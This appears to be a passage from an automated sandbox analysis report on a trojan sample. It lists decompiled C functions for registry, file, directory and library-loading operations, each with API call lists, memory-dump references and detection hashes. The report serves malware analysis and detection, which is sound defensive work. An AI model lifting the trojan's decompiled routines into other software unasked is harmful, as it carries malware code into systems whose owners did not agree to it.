                                                                                    0x004013c0
                                                                                    0x004013c2
                                                                                    0x004013b9
                                                                                    0x004013b9
                                                                                    0x004013ba
                                                                                    0x004013ba
                                                                                    0x004013c9
                                                                                    0x004013cb
                                                                                    0x004013f4
                                                                                    0x004013f4
                                                                                    0x004013c9
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                    • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                    • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                    • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00402434(void* __ebx) {
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x20) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
				if( *(_t23 - 0x20) != __ebx) {
					_t18 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1);
					goto L4;
				} else {
					_t10 = E00402DE6(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                                                                    0x00402434
                                                                                    0x00402434
                                                                                    0x00402437
                                                                                    0x0040243a
                                                                                    0x0040247b
                                                                                    0x00000000
                                                                                    0x0040243c
                                                                                    0x0040243e
                                                                                    0x00402443
                                                                                    0x00402447
                                                                                    0x0040292e
                                                                                    0x0040292e
                                                                                    0x0040244d
                                                                                    0x0040245d
                                                                                    0x0040245f
                                                                                    0x0040247d
                                                                                    0x0040247f
                                                                                    0x00000000
                                                                                    0x00402485
                                                                                    0x0040247f
                                                                                    0x00402447
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseDeleteValue
                                                                                    • String ID:
                                                                                    • API String ID: 2831762973-0
                                                                                    • Opcode ID: 9d2bdfb1ffd1eaf31ef4080915ef0d30e5364c3a0a2d1d8bfd58f259d8f9472f
                                                                                    • Instruction ID: 27a137a867c600d8965633a271772258b7302ea9b92edfc7e4bdeed26dcbc29b
                                                                                    • Opcode Fuzzy Hash: 9d2bdfb1ffd1eaf31ef4080915ef0d30e5364c3a0a2d1d8bfd58f259d8f9472f
                                                                                    • Instruction Fuzzy Hash: 54F06272A04120EBDB11ABB89B4DAAD72A9AF44354F15443BE141B71C0DAFC5D05866E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnableShow
                                                                                    • String ID:
                                                                                    • API String ID: 1136574915-0
                                                                                    • Opcode ID: 9998e1efd4358ecfdf2af1e368b1e9f809be2d6bf6a1075ade45af43b03083af
                                                                                    • Instruction ID: 74d914ea4967392a65d1c9fdd8f91c6329c2dde8704c14122971abf6b6e16597
                                                                                    • Opcode Fuzzy Hash: 9998e1efd4358ecfdf2af1e368b1e9f809be2d6bf6a1075ade45af43b03083af
                                                                                    • Instruction Fuzzy Hash: 14E0D872908201CFE705EBA4EE485AD73F0EF40315710097FE401F11D0DBB54C00862D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                    0x00406a3d
                                                                                    0x00406a40
                                                                                    0x00406a47
                                                                                    0x00406a4f
                                                                                    0x00406a5b
                                                                                    0x00000000
                                                                                    0x00406a62
                                                                                    0x00406a52
                                                                                    0x00406a59
                                                                                    0x00000000
                                                                                    0x00406a6a
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                      • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                      • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                      • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2547128583-0
                                                                                    • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                    • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                    • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                    • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 68%
                                                                                    			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                    0x0040615c
                                                                                    0x00406169
                                                                                    0x0040617e
                                                                                    0x00406184

                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe,80000000,00000003), ref: 0040615C
                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                    • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                    • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                    • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                    0x00406138
                                                                                    0x0040613e
                                                                                    0x00406143
                                                                                    0x0040614c
                                                                                    0x0040614c
                                                                                    0x00406155

                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040614C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                    • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                    • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                    0x00405c1c
                                                                                    0x00405c24
                                                                                    0x00000000
                                                                                    0x00405c2a
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                    • GetLastError.KERNEL32 ref: 00405C2A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                    • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                    • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                    • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0339C9BE Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: a27b740ed05cf21bde0264da7e002ce02a143215043fc03c68b8e3ab58670d45
                                                                                    • Instruction ID: 0c1f17d6216b370a34e20eecf5d1af469d1eb00aa22cc3753df4cb2e410d1386
                                                                                    • Opcode Fuzzy Hash: a27b740ed05cf21bde0264da7e002ce02a143215043fc03c68b8e3ab58670d45
                                                                                    • Instruction Fuzzy Hash: AF313B75A0434ADFEF30EF6488C63E977A6AF95210F654227CC495F644C7708642C751
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03392FB7 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnumWindows.USER32(000000AA,0000005B,000000AA,00000000,?,03392C71), ref: 03393034
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnumWindows
                                                                                    • String ID:
                                                                                    • API String ID: 1129996299-0
                                                                                    • Opcode ID: c1f9f3134b246a0764bcf3a3561ef97c58e1762b6c1582cd050d605e737f01cd
                                                                                    • Instruction ID: e0d2685a7db4100ae2823302daf8fe66131f48005a73350d4789510f67bde65b
                                                                                    • Opcode Fuzzy Hash: c1f9f3134b246a0764bcf3a3561ef97c58e1762b6c1582cd050d605e737f01cd
                                                                                    • Instruction Fuzzy Hash: CA21807A8186E89FEB21DF248C552C67B95DF46714F2548E7CD449F20AC3351D058791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03392FF6 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnumWindows.USER32(000000AA,0000005B,000000AA,00000000,?,03392C71), ref: 03393034
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnumWindows
                                                                                    • String ID:
                                                                                    • API String ID: 1129996299-0
                                                                                    • Opcode ID: 65b361e388725ff2490dcefd81b0ecf8e83de42596026b8678c272cb8f98b91d
                                                                                    • Instruction ID: 3331934e182db38a29c3ba8868749c04f2c0bc2a99ba75198e78469048d5d461
                                                                                    • Opcode Fuzzy Hash: 65b361e388725ff2490dcefd81b0ecf8e83de42596026b8678c272cb8f98b91d
                                                                                    • Instruction Fuzzy Hash: F9117A768196E88FEB219F388C552C67BA9DF06714F2A48EBCD849F20AC3361D05C791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0339DB0F Relevance: 1.5, APIs: 1, Instructions: 43libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNELBASE(2A299079), ref: 0339DBDE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 58759de6e7c75ad6a35d2897544ecb073cd6d12cc59fe257aa7e465827dd1fbd
                                                                                    • Instruction ID: 7d81eda2b96e7307200f7525ac4baa5059fe17ffe61879c4b6e09444ab8a6bb2
                                                                                    • Opcode Fuzzy Hash: 58759de6e7c75ad6a35d2897544ecb073cd6d12cc59fe257aa7e465827dd1fbd
                                                                                    • Instruction Fuzzy Hash: 2C01F276A04304DBDF34DF658C883E976A6AFA4360F55822ADC0D9B354D37089018750
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}







                                                                                    0x004023b2
                                                                                    0x004023b2
                                                                                    0x004023b4
                                                                                    0x004023b8
                                                                                    0x004023bb
                                                                                    0x004023c0
                                                                                    0x004023c5
                                                                                    0x004023ce
                                                                                    0x004023ce
                                                                                    0x004023d3
                                                                                    0x004023dc
                                                                                    0x004023dc
                                                                                    0x004023e9
                                                                                    0x004015b4
                                                                                    0x004015b6
                                                                                    0x0040292e
                                                                                    0x0040292e
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileStringWrite
                                                                                    • String ID:
                                                                                    • API String ID: 390214022-0
                                                                                    • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                    • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                    • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                    • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406503 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00406503(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406454(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                    0x0040650d
                                                                                    0x00406516
                                                                                    0x0040652c
                                                                                    0x00000000
                                                                                    0x0040652c
                                                                                    0x0040651a
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 0040652C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                    • Instruction ID: 390987c888b9fe28ccc3a202ccefe0e129b8fdbaba7b34d45eb5723cdb444700
                                                                                    • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                    • Instruction Fuzzy Hash: C1E0ECB2010109BEEF099F90EC0ADBB372DEB04704F41492EF907E4091E6B5AE70AA34
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                    0x0040620e
                                                                                    0x0040621e
                                                                                    0x00406226
                                                                                    0x00000000
                                                                                    0x0040622d
                                                                                    0x00000000
                                                                                    0x0040622f

                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040EC64,0040CEF0,00403579,0040CEF0,0040EC64,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
